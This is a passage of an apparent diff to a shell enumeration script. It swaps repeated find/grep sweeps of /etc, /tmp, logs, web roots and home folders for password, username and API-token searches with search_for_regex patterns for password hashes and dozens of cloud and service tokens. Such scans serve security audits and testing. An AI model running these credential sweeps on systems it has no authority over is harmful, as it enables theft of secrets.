f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Twitter Secret Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -echo '' -print_2title "Searching Misc" -print_3title_no_nl "Searching Basic Auth (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Passwords1 (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Usernames (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -echo '' + print_2title "Searching Hashed Passwords" + search_for_regex "Apr1 MD5" "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" + search_for_regex "Apache SHA" "\{SHA\}[0-9a-zA-Z/_=]{10,}" + search_for_regex "Blowfish" "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" + search_for_regex "Drupal" "\$S\$[a-zA-Z0-9_/\.]{52}" + search_for_regex "Joomlavbulletin" "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" + search_for_regex "Linux MD5" "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" + search_for_regex "phpbb3" "\$H\$[a-zA-Z0-9_/\.]{31}" + search_for_regex "sha512crypt" "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" + search_for_regex "Wordpress" "\$P\$[a-zA-Z0-9_/\.]{31}" + echo '' + + print_2title "Searching Raw Hashes" + search_for_regex "sha512" "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" + echo '' + + print_2title "Searching APIs" + search_for_regex "Adobe Client Id (Oauth Web)" "(adobe[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1 + search_for_regex "Abode Client Secret" "(p8e-)[a-z0-9]{32}" 1 + search_for_regex "Age Secret Key" "AGE-SECRET-KEY-1[QPZRY9X8GF2TVDW0S3JN54KHCE6MUA7L]{58}" + search_for_regex "Airtable API Key" "[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']\"" + search_for_regex "Alchemi API Key" "(alchemi[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1 + search_for_regex "Alibaba Access Key ID" "(LTAI)[a-z0-9]{20}" 1 + search_for_regex "Alibaba Secret Key" "(alibaba[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1 + search_for_regex "Artifactory API Key & Password" "[\"']AKC[a-zA-Z0-9]{10,}[\"']|[\"']AP[0-9ABCDEF][a-zA-Z0-9]{8,}[\"']" + search_for_regex "Asana Client ID" "((asana[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 + search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1 + search_for_regex "AWS Client ID" "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" + search_for_regex "AWS MWS Key" "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" + search_for_regex "AWS AppSync GraphQL Key" "da2-[a-z0-9]{26}" + search_for_regex "Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" + search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\-]{44})['\"]" 1 + search_for_regex "Binance API Key" "(binance[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1 + search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 + search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\-]{64})['\"])" 1 + search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1 + search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1 + search_for_regex "Birise API Key" "(bitrise[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\-]{86})['\"]" 1 + search_for_regex "Block API Key" "(block[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]" 1 + search_for_regex "Blockchain API Key" "mainnet[a-zA-Z0-9]{32}|testnet[a-zA-Z0-9]{32}|ipfs[a-zA-Z0-9]{32}" + search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]" 1 + search_for_regex "Box API Key" "(box[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 + search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1 + search_for_regex "Clearbit API Key" "sk_[a-z0-9]{32}" + search_for_regex "Clojars API Key" "(CLOJARS_)[a-zA-Z0-9]{60}" + search_for_regex "Cloudinary Basic Auth" "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" + search_for_regex "Coinlayer API Key" "(coinlayer[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1 + search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{43})['\"]" 1 + search_for_regex "Covalent API Key" "ckey_[a-z0-9]{27}" + search_for_regex "Charity Search API Key" "(charity.?search[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Databricks API Key" "dapi[a-h0-9]{32}" + search_for_regex "DDownload API Key" "(ddownload[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1 + search_for_regex "Defined Networking API token" "(dnkey-[a-z0-9=_\-]{26}-[a-z0-9=_\-]{52})" + search_for_regex "Discord API Key, Client ID & Client Secret" "((discord[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\-]{32})['\"])" 1 + search_for_regex "Dropbox API Key" "sl.[a-zA-Z0-9_-]{136}" + search_for_regex "Doppler API Key" "(dp\.pt\.)[a-zA-Z0-9]{43}" + search_for_regex "Dropbox API secret/key, short & long lived API Key" "(dropbox[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\.[a-z0-9=_\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\-]{43})['\"]" 1 + search_for_regex "Duffel API Key" "duffel_(test|live)_[a-zA-Z0-9_-]{43}" + search_for_regex "Dynatrace API Key" "dt0c01\.[a-zA-Z0-9]{24}\.[a-z0-9]{64}" + search_for_regex "EasyPost API Key" "EZAK[a-zA-Z0-9]{54}" + search_for_regex "EasyPost test API Key" "EZTK[a-zA-Z0-9]{54}" + search_for_regex "Etherscan API Key" "(etherscan[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]" + search_for_regex "Facebook Access Token" "EAACEdEose0cBA[0-9A-Za-z]+" + search_for_regex "Facebook Client ID" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" + search_for_regex "Facebook Oauth" "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" + search_for_regex "Facebook Secret Key" "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" + search_for_regex "Fastly API Key" "(fastly[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{32})['\"]" 1 + search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]" 1 + search_for_regex "Flutterweave Keys" "FLWPUBK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST[a-hA-H0-9]{12}" + search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\-]{64}" + search_for_regex "Github" "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" + search_for_regex "Github App Token" "(ghu|ghs)_[0-9a-zA-Z]{36}" + search_for_regex "Github OAuth Access Token" "gho_[0-9a-zA-Z]{36}" + search_for_regex "Github Personal Access Token" "ghp_[0-9a-zA-Z]{36}" + search_for_regex "Github Refresh Token" "ghr_[0-9a-zA-Z]{76}" + search_for_regex "GitHub Fine-Grained Personal Access Token" "github_pat_[0-9a-zA-Z_]{82}" + search_for_regex "Gitlab Personal Access Token" "glpat-[0-9a-zA-Z\-]{20}" + search_for_regex "GitLab Pipeline Trigger Token" "glptt-[0-9a-f]{40}" + search_for_regex "GitLab Runner Registration Token" "GR1348941[0-9a-zA-Z_\-]{20}" + search_for_regex "GoCardless API Key" "live_[a-zA-Z0-9_=\-]{40}" + search_for_regex "GoFile API Key" "(gofile[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1 + search_for_regex "Google API Key" "AIza[0-9A-Za-z_\-]{35}" + search_for_regex "Google Cloud Platform API Key" "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" + search_for_regex "Google Drive Oauth" "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" + search_for_regex "Google Oauth Access Token" "ya29\.[0-9A-Za-z_\-]+" + search_for_regex "Google (GCP) Service-account" "\"type.+:.+\"service_account" + search_for_regex "Grafana API Key" "eyJrIjoi[a-z0-9_=\-]{72,92}" 1 + search_for_regex "Grafana cloud api token" "glc_[A-Za-z0-9\+/]{32,}={0,2}" + search_for_regex "Grafana service account token" "(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})" + search_for_regex "Hashicorp Terraform user/org API Key" "[a-z0-9]{14}\.atlasv1\.[a-z0-9_=\-]{60,70}" + search_for_regex "Heroku API Key" "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" + search_for_regex "Hubspot API Key" "['\"][a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12}['\"]" 1 + search_for_regex "Instatus API Key" "(instatus[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 + search_for_regex "Ionic API Key" "(ionic[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1 + search_for_regex "Jenkins Creds" "<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" + search_for_regex "JSON Web Token" "(ey[0-9a-z]{30,34}\.ey[0-9a-z\/_\-]{30,}\.[0-9a-zA-Z\/_\-]{10,}={0,2})" + search_for_regex "Kraken Access Token" "([a-z0-9\/=_\+\-]{80,90})" + search_for_regex "Kucoin Secret Key" "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})" + search_for_regex "Linear API Key" "(lin_api_[a-zA-Z0-9]{40})" + search_for_regex "Linear Client Secret/ID" "((linear[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])" + search_for_regex "LinkedIn Client ID" "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" + search_for_regex "LinkedIn Secret Key" "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" + search_for_regex "Lob API Key" "((lob[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])" 1 + search_for_regex "Lob Publishable API Key" "((test|live)_pub_[a-f0-9]{31})" + search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1 + search_for_regex "Mailchimp API Key" "[0-9a-f]{32}-us[0-9]{1,2}" + search_for_regex "Mailgun API Key" "key-[0-9a-zA-Z]{32}'" + search_for_regex "Mailgun Public Validation Key" "pubkey-[a-f0-9]{32}" + search_for_regex "Mailgun Webhook signing key" "[a-h0-9]{32}-[a-h0-9]{8}-[a-h0-9]{8}" + search_for_regex "Mapbox API Key" "(pk\.[a-z0-9]{60}\.[a-z0-9]{22})" 1 + search_for_regex "MessageBird API Key & API client ID" "(messagebird[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]" 1 + search_for_regex "Microsoft Teams Webhook" "https:\/\/[a-z0-9]+\.webhook\.office\.com\/webhookb2\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\/IncomingWebhook\/[a-z0-9]{32}\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}" + search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key" "(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})" + search_for_regex "Nownodes" "(nownodes[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" + search_for_regex "Npm Access Token" "(npm_[a-zA-Z0-9]{36})" + search_for_regex "OpenAI API Token" "sk-[A-Za-z0-9]{48}" + search_for_regex "ORB Intelligence Access Key" "['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]" + search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1 + search_for_regex "PayPal Braintree Access Token" "access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}" + search_for_regex "Picatic API Key" "sk_live_[0-9a-z]{32}" + search_for_regex "Pinata API Key" "(pinata[a-z0-9_ \.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1 + search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\.\-]{43}" + search_for_regex "PlanetScale OAuth token" "(pscale_oauth_[a-zA-Z0-9_\.\-]{32,64})" + search_for_regex "Planetscale Password" "pscale_pw_[a-zA-Z0-9_\.\-]{43}" + search_for_regex "Plaid API Token" 